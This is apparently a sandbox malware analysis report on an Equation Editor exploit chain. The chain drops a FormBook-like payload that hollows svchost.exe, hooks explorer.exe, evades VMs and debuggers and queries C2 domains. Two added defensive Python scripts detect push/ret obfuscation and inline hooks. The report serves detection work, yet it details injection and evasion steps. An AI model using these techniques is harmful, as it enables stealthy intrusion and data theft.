        Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: vbc.exe, 00000004.00000002.996335800.0000000000789000.00000004.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000005.00000000.977201481.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000005.00000002.985046531.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000006.00000000.980432583.000000000132E000.00000002.00000001.01000000.00000005.sdmp, svchost.exe, 00000008.00000002.1171414662.000000000023C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171982272.0000000000D2F000.00000004.10000000.00040000.00000000.sdmp, fdvucso.exe.4.dr, nsbF6CE.tmp.4.dr
        Source: Binary string: wntdll.pdb source: fdvucso.exe, fdvucso.exe, 00000006.00000003.984908261.0000000000430000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1036425899.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1035304413.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000003.986623998.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1171527322.0000000000690000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1034856361.0000000000380000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171735626.0000000000810000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1036048676.0000000000500000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: fdvucso.exe, 00000006.00000002.1035230712.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1034825185.0000000000030000.00000040.10000000.00040000.00000000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_01322445 push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_00417811 push cs; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0041E9F4 push ds; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_00416495 push edx; retf
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0041D4B5 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0041D56C push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0041D502 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0041D50B push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_01322445 push ecx; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_006ADFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00116495 push edx; retf
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0011D4B5 push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0011D502 push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0011D50B push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0011D56C push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00117811 push cs; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0011E9F4 push ds; ret
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0011DCB9 push edi; ret
        Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\fdvucso.exe (dropped file)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe (dropped file)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file)
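        The push/ret and push/retf pairs listed above for fdvucso.exe and the hollowed svchost.exe are control-flow obfuscation: "push X; ret" behaves like an indirect jump to X but does not look like one to a linear disassembler or a naive call-graph builder. The following is an added example, not code from the Joe Sandbox report or from the sample, that scans a raw x86 code blob for exactly these sequences and reports them with virtual addresses. The SAMPLE blob and its base address are constructed for the demonstration; no bytes from the analysed files are reproduced.

```python
"""Scan raw x86 code for push/ret(f) control-flow obfuscation sequences.

Added example, not part of the Joe Sandbox report. SAMPLE is constructed by
hand so the script runs offline; in practice the blob would be a code section
read from the unpacked PE or from a process memory dump."""

# Single-byte PUSH opcodes (32-bit mode) and the return opcodes that turn
# "push X; ret" into a disguised jump to X.
PUSH_REG = {0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx",
            0x54: "esp", 0x55: "ebp", 0x56: "esi", 0x57: "edi"}
PUSH_SEG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
RET_OPS = {0xC3: "ret", 0xCB: "retf"}
PUSH_IMM32 = 0x68  # push imm32; followed by ret it is a jmp to the immediate


def find_push_ret(blob: bytes, base: int = 0x400000):
    """Return (virtual address, mnemonic) for every push/ret(f) pair found.

    This is a linear byte scan, not a disassembly: a match inside the
    operand bytes of a longer instruction is possible, so treat the output
    as candidates to confirm in a disassembler."""
    hits = []
    i = 0
    while i < len(blob) - 1:
        op = blob[i]
        if op in PUSH_REG or op in PUSH_SEG:
            ret = blob[i + 1]
            if ret in RET_OPS:
                reg = PUSH_REG.get(op) or PUSH_SEG[op]
                hits.append((base + i, f"push {reg}; {RET_OPS[ret]}"))
        elif op == PUSH_IMM32 and i + 5 < len(blob) and blob[i + 5] in RET_OPS:
            target = int.from_bytes(blob[i + 1:i + 5], "little")
            hits.append((base + i,
                         f"push 0x{target:08x}; {RET_OPS[blob[i + 5]]}  ; jmp 0x{target:08x}"))
        i += 1
    return hits


# Constructed sample: ordinary code with obfuscation gadgets placed between.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp (normal prologue)
    0x51, 0xC3,                          # push ecx; ret
    0x90, 0x90,                          # nop; nop
    0x0E, 0xC3,                          # push cs; ret
    0x1E, 0xC3,                          # push ds; ret
    0x33, 0xC0,                          # xor eax, eax
    0x52, 0xCB,                          # push edx; retf
    0x68, 0x10, 0x20, 0x40, 0x00, 0xC3,  # push 0x00402010; ret
    0x50, 0xC3,                          # push eax; ret
])

if __name__ == "__main__":
    for va, text in find_push_ret(SAMPLE):
        print(f"{va:08x}  {text}")
```

        The two-byte forms are the ones the report lists; the push imm32; ret form is included because it is the same trick with a fixed target and the scanner can recover that target directly. Confirm each hit in a disassembler before treating it as a function boundary or a jump.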

        Boot Survival

        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file)

        Hooking and other Techniques for Hiding and Protection

        Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_01321890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (10 occurrences)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (7 occurrences)
        Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
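        The "User mode code has changed" line above is the sandbox noticing that the first bytes of USER32!PeekMessageA inside explorer.exe no longer match the DLL on disk, which is how user-mode inline hooks (the basis of FormBook's form-grabbing) are normally found. The following is an added example, not code from the Joe Sandbox report, that performs that comparison and, when the new bytes are a recognisable detour stub, decodes where the hook jumps. On a live host the two byte strings would come from ReadProcessMemory and from the image on disk; here they are constructed. The six "new code" bytes for PeekMessageA are the ones the report lists; the clean prologue, the addresses, the injected-region value and the other two exports are assumptions made for the demonstration.

```python
"""Detect user-mode inline hooks by diffing function prologues.

Added example, not part of the Joe Sandbox report. All addresses and the
clean prologue bytes are constructed; only the six PeekMessageA "new code"
bytes are taken from the report."""

import struct

HOOK_LEN = 6  # number of prologue bytes compared


def decode_hook_stub(va: int, code: bytes):
    """Return (kind, target) if the bytes start with a common hook stub."""
    if code[0] == 0xE9 and len(code) >= 5:                      # jmp rel32
        rel = struct.unpack("<i", code[1:5])[0]
        return "jmp rel32", (va + 5 + rel) & 0xFFFFFFFF
    if code[0] == 0x68 and len(code) >= 6 and code[5] == 0xC3:  # push imm32; ret
        return "push/ret", struct.unpack("<I", code[1:5])[0]
    if code[:2] == b"\xFF\x25" and len(code) >= 6:              # jmp dword ptr [addr]
        return "jmp [mem]", struct.unpack("<I", code[2:6])[0]
    return "unrecognised", None


def find_inline_hooks(exports):
    """exports: {name: (va, disk_bytes, memory_bytes)} -> list of findings."""
    findings = []
    for name, (va, disk, mem) in exports.items():
        if disk[:HOOK_LEN] == mem[:HOOK_LEN]:
            continue                      # prologue untouched
        kind, target = decode_hook_stub(va, mem)
        findings.append({"function": name, "va": va, "kind": kind,
                         "target": target, "new_code": mem[:HOOK_LEN].hex(" ")})
    return findings


def jmp_rel32(from_va: int, to_va: int) -> bytes:
    """Encode 'jmp rel32' placed at from_va and landing on to_va (sample builder)."""
    return b"\xE9" + struct.pack("<i", to_va - (from_va + 5))


# Constructed data. A typical 32-bit prologue: mov edi,edi; push ebp; mov ebp,esp; ...
CLEAN = bytes.fromhex("8bff558bec83")
PEEKMESSAGEA_VA = 0x77D1A3C0    # assumed export address, not from the report
GETMESSAGEA_VA = 0x77D1B000     # assumed
INJECTED_REGION = 0x00B20000    # assumed hook target; the report shows an injected
                                # region at 0xB20000 in svchost.exe, reused here
EXPORTS = {
    # the bytes the report lists as the new code of PeekMessageA in explorer.exe
    "USER32!PeekMessageA": (PEEKMESSAGEA_VA, CLEAN, bytes.fromhex("488bb88eeeec")),
    # constructed: classic jmp rel32 detour into the injected region
    "USER32!GetMessageA": (GETMESSAGEA_VA, CLEAN,
                           jmp_rel32(GETMESSAGEA_VA, INJECTED_REGION) + b"\x83"),
    # constructed: untouched export
    "USER32!SendMessageA": (0x77D1C000, CLEAN, CLEAN),
}

if __name__ == "__main__":
    for finding in find_inline_hooks(EXPORTS):
        print(finding)
```

        A prologue that differs but does not start with one of the three stub shapes is still reported, as "unrecognised"; that is the right default, since a hook that begins with a relocated original instruction (a trampoline that executes the displaced bytes elsewhere) looks exactly like this.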

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000000109904 second address: 000000000010990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 0000000000109B7E second address: 0000000000109B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1544 | Thread sleep time: -420000s >= -30000s
        Source: C:\Windows\explorer.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_00409AB0 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process information queried: ProcessInformation
        Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\Public\vbc.exe | Code function: 4_2_004069A4 FindFirstFileW,FindClose,
        Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040290B FindFirstFileW,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node (4 occurrences)
        Source: C:\Users\Public\vbc.exe | API call chain: ExitProcess graph end node
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | API call chain: ExitProcess graph end node
        Source: explorer.exe, 00000007.00000000.1006642893.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: vbc.exe, 00000004.00000002.996387571.0000000000914000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000lo
        Source: explorer.exe, 00000007.00000000.1048517448.000000000037B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
        Source: explorer.exe, 00000007.00000000.1021582479.0000000004423000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000000.1006642893.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
        Source: explorer.exe, 00000007.00000000.1021428867.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
        Source: explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_01321D2C _memset,IsDebuggerPresent,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_0132558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_01321D17 GetProcessHeap,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_00409AB0 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036605E6 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_00A526F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_006B26F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0040ACF0 LdrLoadDll,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_0132439B SetUnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_013243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_0132439B SetUnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 6_2_013243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\explorer.exe | Domain query: www.insurancecentral.info
        Source: C:\Windows\explorer.exe | Domain query: www.xinli-ac.com
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: B20000
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Memory written: C:\Users\user\AppData\Local\Temp\fdvucso.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Thread register set: target process: 1860
        Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 1860
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
        Source: C:\Users\Public\vbc.exe | Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
        Source: explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.990258090.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1016566477.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.990258090.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1016566477.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_01323283 cpuid
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 5_2_01323EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        Source: Yara match | File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        MITRE ATT&CK Matrix
        ATT&CK matrix, listed by tactic. Numbers in parentheses are the per-technique counts shown in the report; entries without a count are the matrix's fixed placeholders.

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
